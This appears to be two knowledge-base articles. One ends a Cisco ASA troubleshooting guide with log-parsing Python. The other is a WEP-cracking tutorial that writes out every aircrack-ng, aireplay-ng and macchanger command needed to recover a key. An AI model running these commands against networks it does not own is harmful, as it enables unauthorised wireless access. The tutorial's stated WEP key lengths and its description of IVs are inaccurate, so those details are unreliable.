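    """'10.0.0.1.1061' -> ('10.0.0.1', 1061); '4.2.2.2' -> ('4.2.2.2', None)."""
    parts = endpoint.split(".")
    if len(parts) == 5:
        return ".".join(parts[:4]), int(parts[4])
    return endpoint, None


def parse_capture(text: str) -> list[Packet]:
    """Turn the packet lines of a capture into Packet records; other lines are ignored."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                      # "8 packets captured", prompts, blank lines
            continue
        rest = m["rest"]
        if rest.startswith("icmp:"):
            packets.append(Packet(m["src"], m["dst"], "icmp",
                                  rest[len("icmp:"):].strip(), False))
        else:
            flags = rest.split()[0]    # first token is the TCP flag summary
            packets.append(Packet(m["src"], m["dst"], "tcp", flags,
                                  " ack " in f" {rest} "))
    return packets


def diagnose(capture_text: str) -> str:
    """Say which of the article's three situations the capture shows."""
    pkts = parse_capture(capture_text)
    if not pkts:
        return ("nothing captured: the traffic is not reaching this interface "
                "(host firewall, routing, or something upstream)")
    if pkts[0].proto == "icmp":
        req = sum(p.detail == "echo request" for p in pkts)
        rep = sum(p.detail == "echo reply" for p in pkts)
        if rep == 0:
            return (f"{req} echo requests, 0 replies: the replies are not coming back "
                    "through the firewall (check 'inspect icmp' and the return path)")
        return f"{req} echo requests, {rep} replies: ICMP works through the firewall"
    syns = [p for p in pkts if p.detail == "S" and not p.is_ack]
    synacks = [p for p in pkts if p.detail == "S" and p.is_ack]
    port = split_endpoint(syns[0].dst)[1] if syns else None
    if synacks:
        return f"TCP handshake to port {port} completed: this port is open through the firewall"
    if syns:
        return (f"{len(syns)} SYNs to port {port}, no SYN-ACK returned: the destination is "
                "down, not listening, or cannot route back to us")
    return "TCP segments seen but no connection attempt: read the flags by hand"


# Samples copied (trimmed) from the article's captures
NO_TRAFFIC = "0 packet captured\n\n0 packet shown\n"
SYN_ONLY = """3 packets captured

1: 20:28:47.165976 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
2: 20:28:50.214649 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
3: 20:28:56.168951 10.0.0.1.1061 > 123.123.123.123.443: S 1762767908:1762767908(0) win 64240 <mss 1460,nop,nop,sackOK>
3 packets shown
"""
HANDSHAKE = """1: 20:34:49.575806 10.0.0.1.1063 > 123.123.123.123.443: S 4084340501:4084340501(0) win 64240 <mss 1460,nop,nop,sackOK>
2: 20:34:49.576828 123.123.123.123.443 > 10.0.0.1.1063: S 4235939008:4235939008(0) ack 4084340502 win 64240 <mss 1380,nop,nop,sackOK>
3: 20:34:49.577820 10.0.0.1.1063 > 123.123.123.123.443: . ack 4235939009 win 64240
"""
ICMP_OK = """1: 12:56:51.089244 192.168.1.1 > 4.2.2.2: icmp: echo request
2: 12:56:51.104410 4.2.2.2 > 192.168.1.1: icmp: echo reply
"""
ICMP_NO_INSPECT = """1: 13:02:33.285309 192.168.1.1 > 4.2.2.2: icmp: echo request
2: 13:02:37.886596 192.168.1.1 > 4.2.2.2: icmp: echo request
"""

if __name__ == "__main__":
    for name, sample in [("no traffic", NO_TRAFFIC), ("syn only", SYN_ONLY),
                         ("handshake", HANDSHAKE), ("icmp ok", ICMP_OK),
                         ("icmp no inspect", ICMP_NO_INSPECT)]:
        print(f"{name:16s} {diagnose(sample)}")
```

Paste the output of show capture into `diagnose()` as-is; the header and footer lines are skipped. The parser only looks at the flag summary and the presence of an ACK, so it will not distinguish a RST from a firewall-injected reset, but for the “is it me or is it them” question that is all you need.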

Now we can see the port(s) we want to allow are actually working, so if there’s still a problem, there’s probably another port or protocol that’s being blocked. To find out we need to enable logging and see if any packets are being denied. (Level 7 is debugging and gets noisy on a busy firewall; turn it back down when you are done.)

[box]Petes-ASA#configure terminal
Petes-ASA(config)# logg buffer-size 4096
Petes-ASA(config)# logg buffered 7
Petes-ASA(config)# logg on [/box]

Try the connection again, then view the log, (here I’m filtering it on 10.0.0.1, as the log can be quite sizable);

[box]Petes-ASA(config)# show logg | incl 10.0.0.1
%ASA-7-609001: Built local-host inside:10.0.0.1
%ASA-6-302013: Built outbound TCP connection 15 for outside:123.123.123.123/443 (123.123.123.123/443) to inside:10.0.0.1/1070 (10.0.0.1/1070)
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group "outbound" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group "outbound" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group "outbound" [0x0, 0x0]
%ASA-6-302014: Teardown TCP connection 15 for outside:123.123.123.123/443 to inside:10.0.0.1/1070 duration 0:00:30 bytes 1420 TCP FINs
%ASA-7-609002: Teardown local-host inside:10.0.0.1 duration 0:00:30
Petes-ASA(config)# [/box]

As we can see, traffic is being denied, and it's on TCP port 21 (that's FTP, if you're interested). So let's open that port and try again;

[box]Petes-ASA(config)# show logg | incl 10.0.0.1
%ASA-5-111008: User 'enable_15' executed the 'access-list outbound extended permit tcp host 10.0.0.1 host 123.123.123.123 eq 21' command.
%ASA-5-111010: User 'enable_15', running 'CLI' from IP 0.0.0.0, executed 'access-list outbound extended permit tcp host 10.0.0.1 host 123.123.123.123 eq 21'
%ASA-7-609001: Built local-host inside:10.0.0.1
%ASA-6-302013: Built outbound TCP connection 16 for outside:123.123.123.123/443 (123.123.123.123/443) to inside:10.0.0.1/1077 (10.0.0.1/1077)
%ASA-6-302013: Built outbound TCP connection 17 for outside:123.123.123.123/21 (123.123.123.123/21) to inside:10.0.0.1/1080 (10.0.0.1/1080)
%ASA-6-302014: Teardown TCP connection 16 for outside:123.123.123.123/443 to inside:10.0.0.1/1077 duration 0:00:30 bytes 1420 TCP FINs
Petes-ASA(config)# [/box]

And we are working!
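Picking the denies out of a buffered log by eye works for one host, but not for a busy firewall. As an added example (not from the original article), the Python below parses %ASA-4-106023 deny and %ASA-6-302013 build messages in the format shown above and reports, per inside host, the destinations that were denied but never built a connection, which is exactly the list of ACL gaps to investigate; the sample log lines are constructed from the article's output.

```python
import re
from collections import Counter, defaultdict

# Message formats as they appear in "show logging" output (straight or pasted curly quotes accepted).
DENY_RE = re.compile(
    r'%ASA-4-106023: Deny (?P<proto>\w+) src \w+:(?P<src>[\d.]+)/\d+ '
    r'dst \w+:(?P<dst>[\d.]+)/(?P<dport>\d+) by access-group ["\u201c](?P<acl>[^"\u201d]+)')
BUILT_RE = re.compile(
    r'%ASA-6-302013: Built (?P<dir>\w+) \w+ connection \d+ for '
    r'\w+:(?P<ip1>[\d.]+)/(?P<port1>\d+) \S+ to \w+:(?P<ip2>[\d.]+)/(?P<port2>\d+)')

def summarise(lines):
    """Per client IP: Counter of (server_ip, port) built and Counter of (dst_ip, proto, port, acl) denied."""
    out = defaultdict(lambda: {"built": Counter(), "denied": Counter()})
    for line in lines:
        if m := DENY_RE.search(line):
            out[m["src"]]["denied"][(m["dst"], m["proto"], int(m["dport"]), m["acl"])] += 1
        elif m := BUILT_RE.search(line):
            # Outbound: the "for" side is the server and the "to" side the inside client; inbound is reversed.
            if m["dir"] == "outbound":
                client, server = m["ip2"], (m["ip1"], int(m["port1"]))
            else:
                client, server = m["ip1"], (m["ip2"], int(m["port2"]))
            out[client]["built"][server] += 1
    return dict(out)

def missing_permits(summary, host):
    """Denied (dst_ip, proto, port, acl) tuples for host that never built a connection: the ACL gaps to check."""
    s = summary.get(host, {"built": Counter(), "denied": Counter()})
    return sorted(k for k in s["denied"] if (k[0], k[2]) not in s["built"])

# Constructed sample modelled on the buffered log shown in the article, before port 21 was permitted.
SAMPLE_LOG_BEFORE = """\
%ASA-7-609001: Built local-host inside:10.0.0.1
%ASA-6-302013: Built outbound TCP connection 15 for outside:123.123.123.123/443 (123.123.123.123/443) to inside:10.0.0.1/1070 (10.0.0.1/1070)
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group "outbound" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group "outbound" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.0.0.1/1073 dst outside:123.123.123.123/21 by access-group "outbound" [0x0, 0x0]
%ASA-6-302014: Teardown TCP connection 15 for outside:123.123.123.123/443 to inside:10.0.0.1/1070 duration 0:00:30 bytes 1420 TCP FINs
""".splitlines()

# Same log after the permit was added: port 21 now builds, so the earlier denies no longer count as a gap.
SAMPLE_LOG_AFTER = SAMPLE_LOG_BEFORE + [
    "%ASA-6-302013: Built outbound TCP connection 17 for outside:123.123.123.123/21 (123.123.123.123/21) to inside:10.0.0.1/1080 (10.0.0.1/1080)",
]

if __name__ == "__main__":
    for name, log in (("before", SAMPLE_LOG_BEFORE), ("after", SAMPLE_LOG_AFTER)):
        print(name, "->", missing_permits(summarise(log), "10.0.0.1"))
```

Feed it the output of `show logg | incl <host>` and the "before" case prints the one TCP/21 gap while the "after" case prints an empty list.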

If you have got this far and it's still not working, check that the traffic you are trying to send does not need any special inspection enabling. Or the port number you are using may have been reserved for a particular type of traffic (like this).

Failing that, upgrade the ASA, then open a TAC call.

Related Articles, References, Credits, or External Links

NA

Hacking Wireless WEP Keys with BackTrack and Aircrack-ng

KB ID 0000633

Problem

Disclaimer: This article is for educational purposes only. Having the ability to pick a lock does not make you a thief. The main thing to take away from this article is, "DON'T secure your wireless network with WEP".

WEP has been around for a long time now. It's limited to an alphanumeric password, 0-9 and A-F (because it's in hexadecimal), and the password can be 40, 64 or 126 bits long. The flaw is that each bit of information is encrypted with the SAME key; if you can get enough packets (24 bit long packets called IVs), you can mathematically work out what the key is.
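An added note, not part of the original article, to put a number on the 24-bit IV mentioned above (it assumes IVs are picked at random per frame): the IV travels in clear with every frame and is simply prepended to the fixed key, so a repeated IV means the same RC4 keystream is used twice.

$$N = 2^{24} = 16{,}777{,}216 \quad \text{possible IVs}$$

$$P(\text{at least one IV repeated after } n \text{ frames}) \approx 1 - e^{-n(n-1)/2N}$$

$$P = \tfrac{1}{2} \;\Rightarrow\; n \approx \sqrt{2N \ln 2} \approx 4{,}823 \text{ frames}$$

For two frames that share a keystream $K$, $(P_1 \oplus K) \oplus (P_2 \oplus K) = P_1 \oplus P_2$, so every reuse leaks the XOR of two plaintexts, and because the key itself never changes the leak accumulates for as long as the network is up. A longer WEP key does not change $N$, which is why the advice is to stop using WEP rather than to pick a bigger key.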

Solution

To do this I'm going to use BackTrack 5 (R1) installed in a virtual machine. The network card I'm using is an ALFA AWUS036NH USB wireless card; I'm using this card because the Ralink RT2878/3078 chipset inside it just works with airmon-ng, without the need to patch drivers or mess about.

Note: If your wireless card does not work, please do not email me; go to the Aircrack-ng forums.

1. After I’ve plugged the wireless card into the host machine, I’m going to present it to the virtual machine. VM > Removable Devices > Ralink 802.11 n WLAN > Connect.

2. To make sure BackTrack can see the card issue the following command;

[box] airmon-ng [/box]

Take note of the interface name (in the example below it's wlan0). Then, to change the MAC address of the card, we are going to 'spoof' a false MAC address of 00:11:22:33:44:55 with the following commands. (Note: Your interface may not be wlan0, change accordingly);

[box]airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0[/box]

Then to scan and see what networks the card can see issue the following command

[box] airodump-ng wlan0 [/box]

3. Airodump will continue to scan until you press CTRL+C. When you see the target network, take a note of its BSSID and its channel number. My target below is called PeteNetLive, the BSSID is 00:16:B6:B4:66:46, and it's on channel 1.

4. Now scan the target network with the following command;

[box]SYNTAX
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
EXAMPLE
airodump-ng -c 1 -w PeteNetLive --bssid 00:16:B6:B4:66:46 wlan0[/box]

5. Leave that running, and open a new terminal window, execute the following command in the new window;

[box]SYNTAX
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
EXAMPLE
aireplay-ng -1 0 -a 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 -e PeteNetLive wlan0[/box]

You NEED it to say 'Authentication successful'.

6. To throw some traffic across the network issue the following command;

[box]SYNTAX
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
EXAMPLE
aireplay-ng -3 -b 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 wlan0[/box]

Note: '-3' denotes a client attack; if your data packets do not rise (you will understand in a minute), then try with '-4' instead.

7. Back in the original terminal window the Data count should start to rise; do nothing further until it's over 10,000 (that's 10,000 IVs captured).

Reality Check!: In most tutorials (including my video above) this is a nice, painless process. It relies on there being a decent quality signal, the router/access point not crashing because you are 'battering' it, and there being lots of healthy traffic around. You can get enough data packets without the 'aireplay-ng -3' command, but it will take a lot longer. You can stop and start the forcing of traffic by pressing CTRL+C and then executing the command again (it just appends the data to the capture file). In this example I used about five attempts (the router froze and needed to be rebooted), so this is not a quick process. Someone passively attacking your wireless will need a lot of patience. This took about an hour, and I was right next to the router and rebooted it every time it locked up (which I saw because the Data figure suddenly stopped rising).

8. In the example below I'm now over 10,000 IVs captured, and I've stopped forcing traffic (CTRL+C).

9. By default your capture will be in your home folder, and it will be called filename-01.cap (where filename is the name you used in step 4).

10. To crack the key execute the following command;

[box]SYNTAX
aircrack-ng -b (bssid) (file name-01.cap)
EXAMPLE
aircrack-ng -b 00:16:B6:B4:66:46 PeteNetLive-01.cap[/box]

11. It will display the WEP key with colons in it; remove them:

DC:B4:2F:63:C9 = DCB42F63C9 <- Here's the WEP key!

12. And to prove it’s correct.

13. And to prove I didn't just print a sticker, here's the web console of the router.

Related Articles, References, Credits, or External Links

Installing the BackTrack Linux VMware Virtual Machine

Windows – Export / Recover WEP and WPA Wireless Keys